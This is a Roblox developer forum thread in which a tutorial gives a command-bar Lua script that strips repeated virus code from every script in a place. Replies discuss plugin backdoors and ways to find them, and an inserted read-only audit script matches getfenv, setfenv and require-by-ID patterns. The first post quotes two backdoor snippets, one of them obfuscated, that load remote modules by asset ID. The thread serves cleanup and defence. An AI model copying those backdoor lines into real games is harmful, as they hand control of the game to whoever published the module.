How to remove the remnants of a virus (for beginners) (without plugins)

if something has spread viruses throughout your game, this is the tutorial for you. remove all the infected files without losing any of your code! (unless you develop viruses, then this tutorial is not for you)

it happens to the best of us.
you take a free model, or you download a plugin and boom… viruses everywhere
filling your game with

```lua
getfenv()['\144\101\113\117\105\114\101'](5151855975)
```

or

```lua
local loaderFolder = script.Parent
local tempFold = game.ServerStorage
local SettingsModule = 6500274752
require(SettingsModule):Fire()
```

this guide won’t help you find the cause of the issue, but it will help you clean up the place after you removed the source.

step1: create a script in workspace.
step2: name it “antivirusscript”
step3: in that script put the virus code you wish to remove from all your scripts
commit the script if needed

we now have a way to detect the virus, now just a way to remove it from all other scripts
to do so we need to run the following command in the command bar
i made marks in the command so you can understand what it does

```lua
warn("Started") -- shows you that the script is running
local repl = { -- Lua pattern magic characters and their escaped forms, so gsub matches them literally (like % and $)
	["%"] = "%%",
	["$"] = "%$",
	["^"] = "%^",
	["*"] = "%*",
	["("] = "%(",
	[")"] = "%)",
	["."] = "%.",
	["]"] = "%]",
	["["] = "%[",
	["+"] = "%+",
	["-"] = "%-",
	["?"] = "%?",
}

local marker = game.Workspace.antivirusscript -- the script that holds the virus code to remove
local new = string.gsub(marker.Source, ".", repl) -- converts the source of the virus script to something gsub can handle

for i, v in pairs(game:GetDescendants()) do -- checks everything in game
	local suc, mes = pcall(function() -- pcall in case we come across issues or restrictions
		if v:IsA("LuaSourceContainer") then -- checks if the item being inspected is a script, modulescript or localscript
			if v ~= marker then -- skips only the script we made (other scripts in workspace are still cleaned)
				local cleaned, count = string.gsub(v.Source, new, "") -- removes every copy of the virus code from the source
				if count > 0 then
					v.Source = cleaned -- only writes to scripts that actually contained the virus code
				end
				if v.Source == "" then -- checks if there is still code in the file
					v:Destroy() -- deletes the file if there is no code in there
				end
				warn(v) -- to show you that it is a lua container and it is checking the content
				task.wait() -- to make sure your pc doesn't crash
			end
		end
	end)
	if not suc then
		warn(mes) -- shows why an item could not be checked
	end
end

warn("finished") -- to show you it is finished
```

remove the script named antivirusscript and you have just removed a virus from your game

15 Likes

First of all, free infected models are rarely an issue. They can only execute code during gameplay, but cannot edit your place. The only 2 things that can actually add or remove instances in your place are users with access and plugins. Any free model viruses will remain in the free model in edit mode and can simply be fixed by deleting the infected asset.

The actual viruses you should be aware of are infected plugins. Plugins can even edit contents of your scripts, embedding malicious code silently without ever creating new instances. Although this is somewhat less of an issue now that Roblox added script permissions, some original plugins still require access to script source, meaning they are easy targets for scammers.

There are much easier and more efficient ways to detect viruses. There are topics already covering this in detail, so I’ll keep it as simple as I can.

  1. Verify the plugin’s library page for any suspicious details. Account names that resemble that of the original creator with extra or different characters, obvious bot avatar, late date of upload + too many likes and favorites as well as generally negative likes or not enough reviews.
    For extra security, you can always try searching the plugin’s ID in this thread. Although most entries are already removed by Roblox, it is better to remain safe than sorry.
  2. Obviously remove and report the infected plugin/model and search for the original. You’ll gain nothing but headaches from keeping it. Identifying infected models and plugins is fairly easy. If it happened after you added/installed something, it’s probably the culprit.

  3. Most malicious plugins will store their instances in lesser known services. Tick the following options in studio settings (ALT+S) under the studio tab and search for any scripts stored where they shouldn’t be.
    image

  4. There are 2 main types of viruses: power viruses and backdoors. Power viruses only exist to cause high CPU usage, making your game unplayable. Backdoors silently create administrative access for their creators. Some of them can be tricky to find, but most contain common code patterns and behaviors.

  • Power viruses will almost always show absurdly high script rates in script performance under the view tab.
  • Backdoors can be a bit trickier, but are almost always obfuscated or require external modules, making them easily identifiable. Use find all (CTRL+SHIFT+F) and search for getfenv, setfenv and require.
4 Likes

this guide is not about how to prevent viruses from entering your game.
this is for what to do when you have found a virus in multiple scripts and want to remove it from there.
as most of the time, all your scripts are infected or you don’t know what scripts are infected

also, it is not meant as to help you remove the source of the virus but how to clean your place up afterwards

by using the output you have the same clearance as any plugin, so it checks hidden services as well

2 Likes

This will only work if the script actually contains code you posted. Some are just plain normal scripts that require an external module and will not be detected by the script you posted. I expanded my reply a bit to cover infection source removal in case people are trying to find more detailed solutions.

see:

yes you do need to know the code

see:

i made this post especially for those hard to remove strings as the normal way of using gsub won't remove that part of code

not the focus of this tutorial but a welcome addition.

this is purely for “hey i removed the source of the virus, but now i'm left with 10000 infected files” situations

Which is quite a bit of an issue. You need to have a sample code to begin with and it is only effective against viruses that create duplicates of the same code. If only one character is replaced, the code you gave becomes redundant. In addition, find all already has the ability to replace all, so I don’t see why someone wouldn’t use that instead.

Instead of having code that replaces code with questionable effectiveness, you should just search for getfenv and remove all lines that use it. Then go over all code with require in case it also creates unobfuscated lines.

I feel like these arguments are getting stuck in a loop and I’m not sure how to rephrase them in a way to make them more understandable.
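
The search suggested in the replies above (look for getfenv, setfenv and require) can also be run from the Studio command bar as a read-only audit. This is an added example, not code from anyone in the thread: it only reports the script path and line number of each match and changes nothing. The rule names, the 8-digit threshold and the 120-character truncation are assumptions.

```lua
-- Added example: read-only audit for the Studio command bar; it edits nothing.
-- Rule list and thresholds are assumptions, built from the indicators named in this thread.
local RULES = {
	{ name = "getfenv call", pattern = "getfenv%s*%(" },
	{ name = "setfenv call", pattern = "setfenv%s*%(" },
	{ name = "require by numeric ID", pattern = "require%s*%(%s*%d+" },
	{ name = "8+ digit number assigned (possible asset ID)", pattern = "=%s*%d%d%d%d%d%d%d%d+" },
	{ name = "run of decimal escapes (hidden string)", pattern = "\\%d+\\%d+\\%d+" },
}

-- Returns a list of {line, rule, text}, one entry per rule that matches a line.
local function scanSource(source)
	local hits = {}
	for lineNumber, line in ipairs(string.split(source, "\n")) do
		for _, rule in ipairs(RULES) do
			if string.find(line, rule.pattern) then
				table.insert(hits, { line = lineNumber, rule = rule.name, text = line })
			end
		end
	end
	return hits
end

-- Self-check against the two infected snippets quoted in the first post.
assert(#scanSource([=[getfenv()['\144\101\113\117\105\114\101'](5151855975)]=]) == 2)
assert(#scanSource("local SettingsModule = 6500274752") == 1)

local flaggedScripts = 0
for _, inst in ipairs(game:GetDescendants()) do
	-- pcall: some instances refuse property reads even from the command bar
	local ok, err = pcall(function()
		if not inst:IsA("LuaSourceContainer") then
			return
		end
		local hits = scanSource(inst.Source)
		if #hits > 0 then
			flaggedScripts += 1
		end
		for _, hit in ipairs(hits) do
			-- obfuscated lines can be huge, so print only the first 120 characters
			warn(string.format("%s:%d [%s] %s", inst:GetFullName(), hit.line, hit.rule, string.sub(hit.text, 1, 120)))
		end
	end)
	if not ok then
		warn("skipped an instance:", err)
	end
end
print(string.format("Audit finished: %d script(s) need manual review", flaggedScripts))
```

Matches are leads for manual review, not verdicts: legitimate code can assign large numbers, and a `require` of a variable is only caught through the line that assigns the ID.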

that is usually how these kinds of viruses work.
they infect hundreds of files with the same code.
that is what this code is for.
to clean the same line of codes from all your files.
if the case is different either do the steps multiple times for each variant or search another method.

replace all is also a good way to replace lines of code. if you prefer that one go for it.
although small in number sometimes I get 0 finding results with replace
(when i come across an example I'll share it)
therefore I looked (and shared) another method

if you have the line… this script will replace it. there is no doubt.
if you want to do it manually yeah go for it, it is more thorough (assuming hidden files are on). but with 100s of files, it can be a long process.
the idea is to have this code run and be done with it.

Thanks so much, I downloaded a fake auto rounder plugin for parts in Roblox Studio, whenever I autorounded a part it contained a script with “Getfenv” in it, so I deleted all of them and the plugin and the virus went away!

1 Like